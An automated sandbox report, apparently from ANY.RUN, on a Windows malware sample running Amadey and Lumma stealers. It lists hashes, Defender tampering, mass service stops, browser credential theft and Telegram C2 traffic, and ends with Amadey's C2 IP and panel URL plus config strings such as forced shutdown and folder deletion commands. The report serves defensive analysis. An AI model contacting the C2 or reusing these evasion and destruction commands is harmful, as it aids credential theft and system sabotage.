File name:

2025-05-15_d53e258194b9334b455b71f180de56a0_agent-tesla_amadey_black-basta_cobalt-strike_darkgate_elex_luca-stealer

Full analysis: https://app.any.run/tasks/05273a5e-0c49-4625-9a12-9c5dbeb83ece
Verdict: Malicious activity
Threats:

Amadey is a formidable Windows infostealer threat, characterized by its persistence mechanisms, modular design, and ability to execute various malicious tasks.

Analysis date: May 15, 2025, 15:21:13
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
auto-sch
loader
amadey
botnet
stealer
lumma
auto-reg
rdp
gcleaner
telegram
evasion
stealc
vidar
auto
generic
credentialflusher
delphi
enigma
antivm
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, 5 sections
MD5:

D53E258194B9334B455B71F180DE56A0

SHA1:

327E38E38E9F90D2292F138F66FEBAF54024922C

SHA256:

DF81C18F8D54F5F79CFE2CB269A3640FA81158E65F7AD885743B9AE8C99BE4B4

SSDEEP:

49152:4PPkzemqoSut3Jh4+QQ/btosJwIA4hHmZlKH2Tw/Pq83zw0bCjvk9G661QGtBTXo:qP/mp7t3T4+B/btosJwIA4hHmZlKH2TD

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Uses Task Scheduler to run other applications

      • cmd.exe (PID: 7836)
      • cmd.exe (PID: 10796)
    • Run PowerShell with an invisible window

      • powershell.exe (PID: 8016)
      • powershell.exe (PID: 4880)
      • powershell.exe (PID: 10596)
      • powershell.exe (PID: 10280)
    • Request from PowerShell that ran from MSHTA.EXE

      • powershell.exe (PID: 4880)
      • powershell.exe (PID: 8016)
    • Script downloads file (POWERSHELL)

      • powershell.exe (PID: 4880)
      • powershell.exe (PID: 8016)
    • AMADEY mutex has been found

      • Temp3NAWOCMQ4KJ4EPAX1VEF2HYL6RJG83XQ.EXE (PID: 6724)
      • ramez.exe (PID: 4040)
      • ramez.exe (PID: 8024)
    • AMADEY has been detected (SURICATA)

      • ramez.exe (PID: 4040)
    • Connects to the CnC server

      • ramez.exe (PID: 4040)
      • svchost.exe (PID: 2196)
    • Changes the autorun value in the registry

      • ramez.exe (PID: 4040)
    • AMADEY has been detected (YARA)

      • ramez.exe (PID: 4040)
    • Adds path to the Windows Defender exclusion list

      • cmd.exe (PID: 2096)
      • NSudoLG.exe (PID: 6960)
    • Changes Windows Defender settings

      • NSudoLG.exe (PID: 6960)
    • Stealers network behavior

      • svchost.exe (PID: 2196)
    • Executing a file with an untrusted certificate

      • j6J70wm.exe (PID: 1272)
      • ra02W4S.exe (PID: 4376)
      • HGVm49v.exe (PID: 9036)
    • LUMMA has been detected (SURICATA)

      • svchost.exe (PID: 2196)
      • MSBuild.exe (PID: 5868)
      • MSBuild.exe (PID: 7720)
      • MSBuild.exe (PID: 8948)
      • 9876f7931b.exe (PID: 9880)
    • Starts SC.EXE for service management

      • cmd.exe (PID: 2096)
      • cmd.exe (PID: 7240)
      • cmd.exe (PID: 9868)
    • LUMMA mutex has been found

      • MSBuild.exe (PID: 5868)
    • Steals credentials from Web Browsers

      • MSBuild.exe (PID: 5868)
    • Actions looks like stealing of personal data

      • MSBuild.exe (PID: 5868)
    • LUMMA has been detected (YARA)

      • MSBuild.exe (PID: 5868)
    • GCLEANER has been detected (SURICATA)

      • fd88613613.exe (PID: 6560)
      • ra02W4S.exe (PID: 4376)
    • GENERIC has been found (auto)

      • fd88613613.exe (PID: 6560)
    • Possible tool for stealing has been detected

      • firefox.exe (PID: 12104)
      • bfab5105ed.exe (PID: 9652)
      • firefox.exe (PID: 11796)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • 2025-05-15_d53e258194b9334b455b71f180de56a0_agent-tesla_amadey_black-basta_cobalt-strike_darkgate_elex_luca-stealer.exe (PID: 7816)
      • cmd.exe (PID: 2568)
      • 85ea4c301e.exe (PID: 5728)
      • cmd.exe (PID: 6404)
      • NSudoLG.exe (PID: 6808)
      • nircmd.exe (PID: 7264)
      • cmd.exe (PID: 7928)
      • cmd.exe (PID: 2096)
      • Unlocker.exe (PID: 4448)
      • Unlocker.exe (PID: 7876)
      • Unlocker.exe (PID: 2192)
      • 85ea4c301e.exe (PID: 5736)
      • nircmd.exe (PID: 7368)
      • cmd.exe (PID: 1072)
      • cmd.exe (PID: 7592)
      • NSudoLG.exe (PID: 6476)
      • cmd.exe (PID: 7664)
      • cmd.exe (PID: 7240)
      • Unlocker.exe (PID: 4188)
      • Unlocker.exe (PID: 8424)
      • svchost.exe (PID: 8772)
      • cmd.exe (PID: 10196)
      • 8b33ceb360.exe (PID: 10144)
      • cmd.exe (PID: 9460)
      • nircmd.exe (PID: 3804)
      • NSudoLG.exe (PID: 9740)
      • cmd.exe (PID: 9660)
      • cmd.exe (PID: 9868)
      • Unlocker.exe (PID: 9368)
      • Unlocker.exe (PID: 10748)
      • 6a8a705c78.exe (PID: 9752)
    • Starts process via Powershell

      • powershell.exe (PID: 8016)
      • powershell.exe (PID: 4880)
      • powershell.exe (PID: 10280)
      • powershell.exe (PID: 10596)
    • Starts POWERSHELL.EXE for commands execution

      • mshta.exe (PID: 8168)
      • mshta.exe (PID: 7864)
      • NSudoLG.exe (PID: 6960)
      • globalsynapse398.exe (PID: 4932)
      • globalsynapse398.exe (PID: 9676)
      • MSBuild.exe (PID: 6268)
      • mshta.exe (PID: 10884)
      • mshta.exe (PID: 11252)
    • Probably download files using WebClient

      • mshta.exe (PID: 8168)
      • mshta.exe (PID: 7864)
      • mshta.exe (PID: 11252)
      • mshta.exe (PID: 10884)
    • Found IP address in command line

      • powershell.exe (PID: 8016)
      • powershell.exe (PID: 4880)
      • powershell.exe (PID: 10596)
      • powershell.exe (PID: 10280)
    • Manipulates environment variables

      • powershell.exe (PID: 8016)
      • powershell.exe (PID: 4880)
      • powershell.exe (PID: 10596)
      • powershell.exe (PID: 10280)
    • Connects to the server without a host name

      • powershell.exe (PID: 4880)
      • powershell.exe (PID: 8016)
      • ramez.exe (PID: 4040)
      • svchost.exe (PID: 8772)
      • ra02W4S.exe (PID: 4376)
      • fd88613613.exe (PID: 6560)
      • powershell.exe (PID: 10596)
    • Process requests binary or script from the Internet

      • powershell.exe (PID: 4880)
      • powershell.exe (PID: 8016)
      • ramez.exe (PID: 4040)
      • powershell.exe (PID: 10596)
    • Potential Corporate Privacy Violation

      • powershell.exe (PID: 4880)
      • powershell.exe (PID: 8016)
      • ramez.exe (PID: 4040)
      • fd88613613.exe (PID: 6560)
      • ra02W4S.exe (PID: 4376)
      • powershell.exe (PID: 10596)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 8016)
      • 85ea4c301e.exe (PID: 5728)
      • ramez.exe (PID: 4040)
      • Temp3NAWOCMQ4KJ4EPAX1VEF2HYL6RJG83XQ.EXE (PID: 6724)
      • 7z.exe (PID: 7256)
      • Unlocker.exe (PID: 7876)
      • cmd.exe (PID: 2096)
      • 7z.exe (PID: 2144)
      • fd88613613.exe (PID: 6560)
      • Rkm9TN0qYx.tmp (PID: 728)
      • Rkm9TN0qYx.exe (PID: 8908)
      • cbbb2df539.exe (PID: 8588)
      • cbbb2df539.tmp (PID: 8776)
      • ra02W4S.exe (PID: 4376)
      • globalsynapse398.exe (PID: 4932)
      • 8UtFuxW5Nw.exe (PID: 9548)
      • 8UtFuxW5Nw.tmp (PID: 9568)
      • 7z.exe (PID: 5392)
      • csc.exe (PID: 11036)
      • powershell.exe (PID: 10596)
      • csc.exe (PID: 11200)
      • csc.exe (PID: 11920)
      • csc.exe (PID: 12952)
      • csc.exe (PID: 12256)
      • csc.exe (PID: 12976)
      • csc.exe (PID: 13012)
      • csc.exe (PID: 13080)
      • csc.exe (PID: 12960)
      • csc.exe (PID: 13600)
      • csc.exe (PID: 13580)
      • csc.exe (PID: 13772)
      • csc.exe (PID: 13632)
      • csc.exe (PID: 13708)
      • csc.exe (PID: 13816)
    • Reads security settings of Internet Explorer

      • ramez.exe (PID: 4040)
      • Temp3NAWOCMQ4KJ4EPAX1VEF2HYL6RJG83XQ.EXE (PID: 6724)
      • 85ea4c301e.exe (PID: 5728)
      • nircmd.exe (PID: 7264)
      • Unlocker.exe (PID: 4448)
      • Unlocker.exe (PID: 7876)
      • Unlocker.exe (PID: 2192)
      • 85ea4c301e.exe (PID: 5736)
      • nircmd.exe (PID: 7368)
    • Starts itself from another location

      • Temp3NAWOCMQ4KJ4EPAX1VEF2HYL6RJG83XQ.EXE (PID: 6724)
    • Contacting a server suspected of hosting an CnC

      • ramez.exe (PID: 4040)
      • svchost.exe (PID: 2196)
      • MSBuild.exe (PID: 5868)
      • MSBuild.exe (PID: 7720)
      • MSBuild.exe (PID: 8948)
      • 9876f7931b.exe (PID: 9880)
    • The process creates files with name similar to system file names

      • 85ea4c301e.exe (PID: 5728)
    • Executing commands from a ".bat" file

      • 85ea4c301e.exe (PID: 5728)
      • cmd.exe (PID: 2568)
      • nircmd.exe (PID: 7264)
      • cmd.exe (PID: 6404)
      • NSudoLG.exe (PID: 6808)
      • cmd.exe (PID: 7928)
      • 85ea4c301e.exe (PID: 5736)
      • cmd.exe (PID: 7592)
      • nircmd.exe (PID: 7368)
      • cmd.exe (PID: 1072)
      • NSudoLG.exe (PID: 6476)
      • cmd.exe (PID: 7664)
      • 8b33ceb360.exe (PID: 10144)
      • cmd.exe (PID: 10196)
      • cmd.exe (PID: 9460)
      • NSudoLG.exe (PID: 9740)
      • cmd.exe (PID: 9660)
      • nircmd.exe (PID: 3804)
    • Application launched itself

      • cmd.exe (PID: 2568)
      • cmd.exe (PID: 7928)
      • cmd.exe (PID: 6404)
      • cmd.exe (PID: 2096)
      • cmd.exe (PID: 7592)
      • cmd.exe (PID: 1072)
      • cmd.exe (PID: 7664)
      • cmd.exe (PID: 7240)
      • cmd.exe (PID: 10196)
      • cmd.exe (PID: 9460)
      • cmd.exe (PID: 9660)
      • cmd.exe (PID: 9868)
    • Starts application with an unusual extension

      • cmd.exe (PID: 7196)
      • cmd.exe (PID: 7668)
      • cmd.exe (PID: 2096)
      • cmd.exe (PID: 5436)
      • cmd.exe (PID: 8016)
      • cmd.exe (PID: 7240)
      • cmd.exe (PID: 9264)
      • cmd.exe (PID: 9868)
      • cmd.exe (PID: 9536)
    • The executable file from the user directory is run by the CMD process

      • nircmd.exe (PID: 7264)
      • NSudoLG.exe (PID: 6808)
      • NSudoLG.exe (PID: 6960)
      • 7z.exe (PID: 7256)
      • Unlocker.exe (PID: 4448)
      • Unlocker.exe (PID: 7876)
      • Unlocker.exe (PID: 2192)
      • nircmd.exe (PID: 7368)
      • NSudoLG.exe (PID: 6476)
      • 7z.exe (PID: 2144)
      • Unlocker.exe (PID: 4188)
      • Unlocker.exe (PID: 8424)
      • NSudoLG.exe (PID: 9740)
      • nircmd.exe (PID: 3804)
      • 7z.exe (PID: 5392)
      • Unlocker.exe (PID: 9368)
      • Unlocker.exe (PID: 10748)
    • Reads the date of Windows installation

      • nircmd.exe (PID: 7264)
      • Unlocker.exe (PID: 4448)
      • Unlocker.exe (PID: 7876)
      • Unlocker.exe (PID: 2192)
      • nircmd.exe (PID: 7368)
    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 7668)
      • cmd.exe (PID: 2096)
      • cmd.exe (PID: 7240)
      • cmd.exe (PID: 8016)
      • cmd.exe (PID: 9536)
      • cmd.exe (PID: 9868)
    • There is functionality for enable RDP (YARA)

      • ramez.exe (PID: 4040)
    • There is functionality for taking screenshot (YARA)

      • ramez.exe (PID: 4040)
      • fd88613613.exe (PID: 6560)
      • MSBuild.exe (PID: 5868)
    • Get information on the list of running processes

      • cmd.exe (PID: 2096)
      • cmd.exe (PID: 5436)
      • cmd.exe (PID: 7240)
      • cmd.exe (PID: 736)
      • cmd.exe (PID: 9868)
      • cmd.exe (PID: 10076)
    • Script adds exclusion path to Windows Defender

      • NSudoLG.exe (PID: 6960)
    • PowerShell delay command usage (probably sleep evasion)

      • powershell.exe (PID: 4980)
    • Starts SC.EXE for service management

      • cmd.exe (PID: 6476)
      • cmd.exe (PID: 2096)
      • cmd.exe (PID: 7988)
      • cmd.exe (PID: 7472)
      • cmd.exe (PID: 3020)
      • cmd.exe (PID: 5680)
      • cmd.exe (PID: 7240)
      • cmd.exe (PID: 8528)
      • cmd.exe (PID: 9868)
      • cmd.exe (PID: 5008)
      • cmd.exe (PID: 10840)
    • Windows service management via SC.EXE

      • sc.exe (PID: 5552)
      • sc.exe (PID: 7712)
      • sc.exe (PID: 7624)
      • sc.exe (PID: 728)
      • sc.exe (PID: 5984)
      • sc.exe (PID: 7412)
      • sc.exe (PID: 1348)
      • sc.exe (PID: 7496)
      • sc.exe (PID: 6184)
      • sc.exe (PID: 668)
      • sc.exe (PID: 644)
      • sc.exe (PID: 904)
      • sc.exe (PID: 1628)
      • sc.exe (PID: 3900)
      • sc.exe (PID: 6564)
      • sc.exe (PID: 7256)
      • sc.exe (PID: 7608)
      • sc.exe (PID: 7228)
      • sc.exe (PID: 7616)
      • sc.exe (PID: 5956)
      • sc.exe (PID: 7700)
      • sc.exe (PID: 7012)
      • sc.exe (PID: 7620)
      • sc.exe (PID: 7596)
      • sc.exe (PID: 7956)
      • sc.exe (PID: 1388)
      • sc.exe (PID: 1228)
      • sc.exe (PID: 2560)
      • sc.exe (PID: 1328)
      • sc.exe (PID: 5064)
      • sc.exe (PID: 2632)
      • sc.exe (PID: 3844)
      • sc.exe (PID: 4212)
      • sc.exe (PID: 7356)
      • sc.exe (PID: 1756)
      • sc.exe (PID: 6080)
      • sc.exe (PID: 4628)
      • sc.exe (PID: 6264)
      • sc.exe (PID: 6404)
      • sc.exe (PID: 6676)
      • sc.exe (PID: 2240)
      • sc.exe (PID: 7488)
      • sc.exe (PID: 7284)
      • sc.exe (PID: 6752)
      • sc.exe (PID: 6108)
      • sc.exe (PID: 7600)
      • sc.exe (PID: 7556)
      • sc.exe (PID: 7280)
      • sc.exe (PID: 8008)
      • sc.exe (PID: 7868)
      • sc.exe (PID: 6808)
      • sc.exe (PID: 8176)
      • sc.exe (PID: 8072)
      • sc.exe (PID: 2424)
      • sc.exe (PID: 8204)
      • sc.exe (PID: 3300)
      • sc.exe (PID: 7904)
      • sc.exe (PID: 5380)
      • sc.exe (PID: 6240)
      • sc.exe (PID: 8408)
      • sc.exe (PID: 8288)
      • sc.exe (PID: 8244)
      • sc.exe (PID: 8328)
      • sc.exe (PID: 8368)
      • sc.exe (PID: 8576)
      • sc.exe (PID: 8452)
      • sc.exe (PID: 8492)
      • sc.exe (PID: 8536)
      • sc.exe (PID: 8620)
      • sc.exe (PID: 8784)
      • sc.exe (PID: 8612)
      • sc.exe (PID: 8660)
      • sc.exe (PID: 8700)
      • sc.exe (PID: 8740)
      • sc.exe (PID: 8824)
      • sc.exe (PID: 8860)
      • sc.exe (PID: 8840)
      • sc.exe (PID: 10060)
      • sc.exe (PID: 10232)
      • sc.exe (PID: 8976)
      • sc.exe (PID: 132)
      • sc.exe (PID: 10188)
      • sc.exe (PID: 9748)
      • sc.exe (PID: 8800)
      • sc.exe (PID: 10064)
      • sc.exe (PID: 10332)
      • sc.exe (PID: 10028)
      • sc.exe (PID: 10168)
      • sc.exe (PID: 8736)
      • sc.exe (PID: 8476)
      • sc.exe (PID: 10256)
      • sc.exe (PID: 10292)
      • sc.exe (PID: 10376)
      • sc.exe (PID: 10416)
      • sc.exe (PID: 10512)
      • sc.exe (PID: 8992)
      • sc.exe (PID: 10104)
      • sc.exe (PID: 10476)
      • sc.exe (PID: 10752)
      • sc.exe (PID: 10592)
      • sc.exe (PID: 10632)
      • sc.exe (PID: 10672)
      • sc.exe (PID: 10712)
      • sc.exe (PID: 10832)
      • sc.exe (PID: 10792)
      • sc.exe (PID: 10872)
      • sc.exe (PID: 10912)
      • sc.exe (PID: 10552)
      • sc.exe (PID: 10956)
      • sc.exe (PID: 10920)
      • sc.exe (PID: 10528)
      • sc.exe (PID: 10508)
      • sc.exe (PID: 10996)
    • Uses TASKKILL.EXE to kill process

      • cmd.exe (PID: 7620)
      • cmd.exe (PID: 3268)
      • cmd.exe (PID: 4448)
      • cmd.exe (PID: 4452)
      • cmd.exe (PID: 8648)
      • cmd.exe (PID: 10224)
      • cmd.exe (PID: 10964)
      • bfab5105ed.exe (PID: 9652)
    • Using 'findstr.exe' to search for text patterns in files and output

      • cmd.exe (PID: 2096)
      • cmd.exe (PID: 7240)
      • cmd.exe (PID: 9868)
    • Drops a system driver (possible attempt to evade defenses)

      • Unlocker.exe (PID: 7876)
    • Process drops legitimate windows executable

      • ramez.exe (PID: 4040)
      • cmd.exe (PID: 2096)
      • 8UtFuxW5Nw.tmp (PID: 9568)
      • Rkm9TN0qYx.tmp (PID: 728)
    • Starts a Microsoft application from unusual location

      • 08IyOOF.exe (PID: 7336)
      • j6J70wm.exe (PID: 1272)
    • Creates or modifies Windows services

      • Unlocker.exe (PID: 7876)
    • Stops a currently running service

      • sc.exe (PID: 5324)
      • sc.exe (PID: 780)
      • sc.exe (PID: 6584)
      • sc.exe (PID: 2904)
      • sc.exe (PID: 7188)
      • sc.exe (PID: 1532)
      • sc.exe (PID: 7252)
      • sc.exe (PID: 6488)
      • sc.exe (PID: 2100)
      • sc.exe (PID: 7808)
      • sc.exe (PID: 3008)
      • sc.exe (PID: 7880)
      • sc.exe (PID: 5544)
      • sc.exe (PID: 2488)
      • sc.exe (PID: 3396)
      • sc.exe (PID: 1452)
      • sc.exe (PID: 7448)
      • sc.exe (PID: 7920)
      • sc.exe (PID: 3240)
      • sc.exe (PID: 8112)
      • sc.exe (PID: 8000)
      • sc.exe (PID: 1568)
      • sc.exe (PID: 5232)
      • sc.exe (PID: 2552)
      • sc.exe (PID: 4688)
      • sc.exe (PID: 8308)
      • sc.exe (PID: 8388)
      • sc.exe (PID: 8472)
      • sc.exe (PID: 8556)
      • sc.exe (PID: 8640)
      • sc.exe (PID: 8224)
      • sc.exe (PID: 8804)
      • sc.exe (PID: 8720)
      • sc.exe (PID: 6876)
      • sc.exe (PID: 9824)
      • sc.exe (PID: 9084)
      • sc.exe (PID: 7656)
      • sc.exe (PID: 8284)
      • sc.exe (PID: 9072)
      • sc.exe (PID: 10312)
      • sc.exe (PID: 10396)
      • sc.exe (PID: 10492)
      • sc.exe (PID: 8060)
      • sc.exe (PID: 10652)
      • sc.exe (PID: 10732)
      • sc.exe (PID: 10812)
      • sc.exe (PID: 10892)
      • sc.exe (PID: 10976)
      • sc.exe (PID: 10572)
    • The process executes via Task Scheduler

      • ramez.exe (PID: 8024)
      • ramez.exe (PID: 11168)
    • Deletes scheduled task without confirmation

      • schtasks.exe (PID: 7364)
      • schtasks.exe (PID: 7428)
      • schtasks.exe (PID: 2332)
      • schtasks.exe (PID: 924)
      • schtasks.exe (PID: 5452)
      • schtasks.exe (PID: 8960)
      • schtasks.exe (PID: 8868)
      • schtasks.exe (PID: 8912)
      • schtasks.exe (PID: 8936)
      • schtasks.exe (PID: 8888)
      • schtasks.exe (PID: 11132)
      • schtasks.exe (PID: 11152)
      • schtasks.exe (PID: 11172)
      • schtasks.exe (PID: 11060)
      • schtasks.exe (PID: 11100)
    • There is functionality for VM detection VirtualBox (YARA)

      • fd88613613.exe (PID: 6560)
    • Process communicates with Telegram (possibly using it as an attacker's C2 server)

      • MSBuild.exe (PID: 9156)
      • MSBuild.exe (PID: 6268)
      • LljZ7EK87Y.exe (PID: 8880)
      • MSBuild.exe (PID: 9484)
      • 2wQ3HMKquh.exe (PID: 10032)
    • Executes application which crashes

      • HGVm49v.exe (PID: 9036)
      • core.exe (PID: 2344)
      • 170d24ef7b.exe (PID: 4108)
    • The process drops C-runtime libraries

      • Rkm9TN0qYx.tmp (PID: 728)
    • Checks for external IP

      • svchost.exe (PID: 8772)
      • svchost.exe (PID: 2196)
    • Base64-obfuscated command line is found

      • MSBuild.exe (PID: 6268)
    • The process bypasses the loading of PowerShell profile settings

      • MSBuild.exe (PID: 6268)
    • The process hide an interactive prompt from the user

      • MSBuild.exe (PID: 6268)
    • BASE64 encoded PowerShell command has been detected

      • MSBuild.exe (PID: 6268)
    • CSC.EXE is used to compile C# code

      • csc.exe (PID: 11036)
      • csc.exe (PID: 11920)
      • csc.exe (PID: 11200)
      • csc.exe (PID: 12960)
      • csc.exe (PID: 13012)
      • csc.exe (PID: 13080)
      • csc.exe (PID: 12256)
      • csc.exe (PID: 12952)
      • csc.exe (PID: 12976)
      • csc.exe (PID: 13580)
      • csc.exe (PID: 13600)
      • csc.exe (PID: 13632)
      • csc.exe (PID: 13708)
      • csc.exe (PID: 13772)
      • csc.exe (PID: 13816)
    • Uses TASKKILL.EXE to kill Browsers

      • bfab5105ed.exe (PID: 9652)
  • INFO

    • Reads the computer name

      • 2025-05-15_d53e258194b9334b455b71f180de56a0_agent-tesla_amadey_black-basta_cobalt-strike_darkgate_elex_luca-stealer.exe (PID: 7816)
      • Temp3NAWOCMQ4KJ4EPAX1VEF2HYL6RJG83XQ.EXE (PID: 6724)
      • ramez.exe (PID: 4040)
      • 85ea4c301e.exe (PID: 5728)
      • nircmd.exe (PID: 7264)
      • NSudoLG.exe (PID: 6808)
      • NSudoLG.exe (PID: 6960)
      • 7z.exe (PID: 7256)
      • fd88613613.exe (PID: 6560)
      • Unlocker.exe (PID: 4448)
      • Unlocker.exe (PID: 7876)
      • IObitUnlocker.exe (PID: 8152)
      • IObitUnlocker.exe (PID: 8184)
      • Unlocker.exe (PID: 2192)
      • MSBuild.exe (PID: 7720)
      • 85ea4c301e.exe (PID: 5736)
      • nircmd.exe (PID: 7368)
    • The sample compiled with english language support

      • 2025-05-15_d53e258194b9334b455b71f180de56a0_agent-tesla_amadey_black-basta_cobalt-strike_darkgate_elex_luca-stealer.exe (PID: 7816)
      • 85ea4c301e.exe (PID: 5728)
      • Unlocker.exe (PID: 7876)
      • ramez.exe (PID: 4040)
      • cmd.exe (PID: 2096)
      • fd88613613.exe (PID: 6560)
      • Rkm9TN0qYx.tmp (PID: 728)
      • ra02W4S.exe (PID: 4376)
      • 8UtFuxW5Nw.tmp (PID: 9568)
    • Reads mouse settings

      • 2025-05-15_d53e258194b9334b455b71f180de56a0_agent-tesla_amadey_black-basta_cobalt-strike_darkgate_elex_luca-stealer.exe (PID: 7816)
    • Checks supported languages

      • 2025-05-15_d53e258194b9334b455b71f180de56a0_agent-tesla_amadey_black-basta_cobalt-strike_darkgate_elex_luca-stealer.exe (PID: 7816)
      • Temp3NAWOCMQ4KJ4EPAX1VEF2HYL6RJG83XQ.EXE (PID: 6724)
      • 85ea4c301e.exe (PID: 5728)
      • chcp.com (PID: 7244)
      • nircmd.exe (PID: 7264)
      • chcp.com (PID: 7592)
      • NSudoLG.exe (PID: 6808)
      • chcp.com (PID: 7988)
      • mode.com (PID: 1328)
      • NSudoLG.exe (PID: 6960)
      • ramez.exe (PID: 4040)
      • fd88613613.exe (PID: 6560)
      • Unlocker.exe (PID: 4448)
      • 7z.exe (PID: 7256)
      • Unlocker.exe (PID: 7876)
      • IObitUnlocker.exe (PID: 8152)
      • 08IyOOF.exe (PID: 7336)
      • IObitUnlocker.exe (PID: 8184)
      • ramez.exe (PID: 8024)
      • MSBuild.exe (PID: 5868)
      • j6J70wm.exe (PID: 1272)
      • Unlocker.exe (PID: 2192)
      • 85ea4c301e.exe (PID: 5736)
      • MSBuild.exe (PID: 7720)
      • chcp.com (PID: 7464)
      • nircmd.exe (PID: 7368)
    • Create files in a temporary directory

      • 2025-05-15_d53e258194b9334b455b71f180de56a0_agent-tesla_amadey_black-basta_cobalt-strike_darkgate_elex_luca-stealer.exe (PID: 7816)
      • 85ea4c301e.exe (PID: 5728)
      • Temp3NAWOCMQ4KJ4EPAX1VEF2HYL6RJG83XQ.EXE (PID: 6724)
      • ramez.exe (PID: 4040)
      • 85ea4c301e.exe (PID: 5736)
    • Auto-launch of the file from Task Scheduler

      • cmd.exe (PID: 7836)
      • cmd.exe (PID: 10796)
    • Reads Internet Explorer settings

      • mshta.exe (PID: 7864)
      • mshta.exe (PID: 8168)
    • Manual execution by a user

      • mshta.exe (PID: 8168)
      • 85ea4c301e.exe (PID: 5736)
      • mshta.exe (PID: 11252)
    • Disables trace logs

      • powershell.exe (PID: 8016)
      • powershell.exe (PID: 4880)
    • Checks proxy server information

      • powershell.exe (PID: 4880)
      • powershell.exe (PID: 8016)
      • ramez.exe (PID: 4040)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 8016)
      • powershell.exe (PID: 4980)
    • The executable file from the user directory is run by the Powershell process

      • Temp3NAWOCMQ4KJ4EPAX1VEF2HYL6RJG83XQ.EXE (PID: 6724)
      • Temp4V29XKKURDT5CRLVXW3SBRDQR5NWMASR.EXE (PID: 9464)
      • Temp4V29XKKURDT5CRLVXW3SBRDQR5NWMASR.EXE (PID: 11072)
    • Process checks computer location settings

      • Temp3NAWOCMQ4KJ4EPAX1VEF2HYL6RJG83XQ.EXE (PID: 6724)
      • 85ea4c301e.exe (PID: 5728)
      • nircmd.exe (PID: 7264)
      • ramez.exe (PID: 4040)
      • 85ea4c301e.exe (PID: 5736)
      • nircmd.exe (PID: 7368)
    • Changes the display of characters in the console

      • cmd.exe (PID: 7196)
      • cmd.exe (PID: 7668)
      • cmd.exe (PID: 2096)
      • cmd.exe (PID: 5436)
      • cmd.exe (PID: 7240)
      • cmd.exe (PID: 8016)
      • cmd.exe (PID: 9264)
      • cmd.exe (PID: 9536)
      • cmd.exe (PID: 9868)
    • NirSoft software is detected

      • nircmd.exe (PID: 7264)
      • nircmd.exe (PID: 7368)
      • nircmd.exe (PID: 3804)
    • Auto-launch of the file from Registry key

      • ramez.exe (PID: 4040)
    • Starts MODE.COM to configure console settings

      • mode.com (PID: 1328)
      • mode.com (PID: 7984)
      • mode.com (PID: 8728)
    • Checks operating system version

      • cmd.exe (PID: 2096)
      • cmd.exe (PID: 7240)
      • cmd.exe (PID: 9868)
    • Creates files or folders in the user directory

      • ramez.exe (PID: 4040)
    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 4980)
    • Reads the machine GUID from the registry

      • Unlocker.exe (PID: 4448)
      • Unlocker.exe (PID: 7876)
      • MSBuild.exe (PID: 5868)
      • Unlocker.exe (PID: 2192)
      • MSBuild.exe (PID: 7720)
    • Reads the software policy settings

      • MSBuild.exe (PID: 5868)
      • MSBuild.exe (PID: 7720)
    • Compiled with Borland Delphi (YARA)

      • fd88613613.exe (PID: 6560)
    • Enigma protector has been detected

      • fd88613613.exe (PID: 6560)
    • Attempting to use instant messaging service

      • MSBuild.exe (PID: 9156)
      • LljZ7EK87Y.exe (PID: 8880)
      • MSBuild.exe (PID: 9484)
    • Changes the registry key values via Powershell

      • globalsynapse398.exe (PID: 4932)
      • globalsynapse398.exe (PID: 9676)
    • Application launched itself

      • chrome.exe (PID: 10740)
      • chrome.exe (PID: 1052)
      • firefox.exe (PID: 12104)
      • chrome.exe (PID: 12140)
      • chrome.exe (PID: 11620)
      • chrome.exe (PID: 12068)
      • chrome.exe (PID: 10908)
      • chrome.exe (PID: 12264)
      • firefox.exe (PID: 11796)
      • chrome.exe (PID: 11988)
      • chrome.exe (PID: 12784)
      • chrome.exe (PID: 6612)
      • chrome.exe (PID: 7052)
      • chrome.exe (PID: 11752)
      • firefox.exe (PID: 11872)
      • chrome.exe (PID: 12824)
      • chrome.exe (PID: 11332)
      • chrome.exe (PID: 12692)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Amadey

(PID) Process(4040) ramez.exe
C2185.156.72.96
URLhttp://185.156.72.96/te4h2nus/index.php
Version5.34
Options
Drop directoryd610cf342e
Drop nameramez.exe
Strings (125)lv:
msi
Kaspersky Lab
av:
|
#
"
\App
00000422
dm:
Powershell.exe
ProgramData\
ps1
rundll32
http://
Content-Disposition: form-data; name="data"; filename="
SOFTWARE\Microsoft\Windows NT\CurrentVersion
dll
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
id:
VideoID
cred.dll|clip.dll|
0000043f
cmd
00000423
SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
-executionpolicy remotesigned -File "
2022
------
2016
og:
\0000
CurrentBuild
2019
:::
S-%lu-
" && timeout 1 && del
ProductName
Panda Security
ESET
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
/k
+++
?scr=1
Doctor Web
GET
SYSTEM\ControlSet001\Services\BasicDisplay\Video
/quiet
.jpg
d610cf342e
vs:
sd:
rundll32.exe
"taskkill /f /im "
pc:
random
=
360TotalSecurity
<d>
wb
Content-Type: multipart/form-data; boundary=----
Startup
Norton
&& Exit"
os:
https://
SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
2025
Avira
%-lu
zip
POST
" Content-Type: application/octet-stream
Rem
/te4h2nus/index.php
------
5.34
<c>
clip.dll
AVAST Software
\
shell32.dll
" && ren
e3
ramez.exe
kernel32.dll
DefaultSettings.XResolution
d1
DefaultSettings.YResolution
185.156.72.96
r=
cred.dll
--
GetNativeSystemInfo
-%lu
ComputerName
&unit=
Keyboard Layout\Preload
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
ar:
Sophos
%USERPROFILE%
exe
e1
e2
st=s
Programs
0123456789
un:
rb
bi:
abcdefghijklmnopqrstuvwxyz0123456789-_
SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
cmd /C RMDIR /s/q
Bitdefender
-unicode-
AVG
WinDefender
&&
shutdown -s -t 0
Comodo
00000419
Content-Type: application/x-www-form-urlencoded
/Plugins/
Main

Lumma

